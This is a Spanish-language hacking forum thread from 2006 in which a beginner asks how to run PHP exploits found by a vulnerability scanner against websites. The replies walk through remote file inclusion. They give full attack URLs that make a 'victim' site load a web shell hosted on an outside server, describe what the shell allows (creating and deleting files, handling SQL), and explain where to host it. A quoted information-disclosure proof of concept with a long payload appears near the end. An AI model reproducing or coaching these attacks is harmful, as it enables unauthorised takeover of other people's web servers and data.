Normas del foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Noviembre 19, 2008, 03:43:35
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderadores: OzX, y0u-uNsEcUre)  |  Tema: Exploits php, ayuda 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Exploits php, ayuda  (Leído 444 veces)
Alex007
Visitante
« en: ſeptiembre 07, 2006, 01:42:15 »
Hola, tengo una duda, al buscar vulnerabilidades a una web, solo me salen con exploits php, y no he encontrado como usarlos  :-\ , algo he leido x ahi k tengo k subirlos a una web, pero cuando copio todo el exploit que me da la pagina
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion y trato de subirlo me da error desde la primera linea  Sad  (lycos, iespana). Estoy haciendo algo mal?
Si me lo piden puedo colgar el exploit  k me da securityfocus, y k me ayuden.Gracias   Smiley
Mejor aki estan los links: (todos risk level: high y con un quick scan)


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion (como lo compilo? no sale si es c, perl o php  Huh  )

Agradeceria muxo k me digan k hace cada exploit, como compilarlos (si es php, a k server subirlo xq no me funciona con los k he dixo antes  Huh ) y como explotar las vulnerabilidades de estos, k sobre este tema recien me he metido ayer y deseo aprender mas,  espero ir mejorando con su ayuda  Smiley.
En línea
anonimox
Visitante
« Respuesta #1 en: ſeptiembre 07, 2006, 04:47:12 »
me parece que estas haciendo mal..


Citar

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion (como lo compilo? no sale si es c, perl o php  Huh  )
No se ejecuta..
esto es asi


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.tupagina.com/shell.php

fijate en la ultima parte... shell.php

esa shell lo tns que subir a una pagina web cualquier que soporte php...

con la shell podes crear, borrar archivos, ver el contenido entero, manejar sql... etc


----------------------------------------------------------------------------------------------------

Este por ejemplo (La verdad que no me fije que hace)

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Se utiliza asi


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://downloads.securityfocus.com/vulnerabilities/exploits/phpflaw.obj

Ahora ya no es mas la shell.php, ahora se ejecutara lo que hace en es pagina exploits/phpflaw.obj..

esto es una RFI(remote files inclussion)  ejecuta phpflaw.obj.. como si fuera un archivo interno de la pagina web..


-------------------------------------------------------------------------------------------------------------
los otros exploit no me fije, pero sera algo similar

cualquier cosa pregunta no mas, que para eso estamos

salu2
En línea
Alex007
Visitante
« Respuesta #2 en: ſeptiembre 07, 2006, 06:52:37 »
En línea
anonimox
Visitante
« Respuesta #3 en: ſeptiembre 07, 2006, 07:30:37 »
la verdad que no se si lycos e iespana soporta php, solo buscate en google: free hosting with php

SQL (Structured Query Language) es un lenguaje para menejo de bases de datos.
En línea
damiguero
Habitual
*****
Desconectado Desconectado

Mensajes: 180


damiguero@hotmail.com
Ver Perfil WWW Email
« Respuesta #4 en: Octubre 02, 2006, 06:09:36 »
creo que tengo el mismo problema...
tengo el exploit php lo subi con el smartftp a un hosting de un amigo: entonces la direccion seria
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.dkns.us/damiguero/shell.php
verdad?

entonces todo el codigo seria:

Código:
http://www.miwebvictima.com/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.dkns.us/damiguero/shell.php

antes hice esto: el codigo lo puse en el block de notas y le di extension php, luego lo subi con el smartftp

pd.- este me sale despues del escaneo en la seccion EXPLOIT:

Código:
PHP Html_Entity_Decode() Information Disclosure Vulnerability

An exploit is not required.

The following proof of concept is available:

<?php

$foobar=html_entity_decode($_GET['foo']);
echo $foobar;

?>

Running it with url:

http://www.example.com/index.php?foo=%00sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
sssssssssssssssssssssssssssssss ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss!
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss!
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss






En línea
mi web:
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.damiguero.tk
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderadores: OzX, y0u-uNsEcUre)  |  Tema: Exploits php, ayuda « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.7 | SMF © 2006-2007, Simple Machines LLC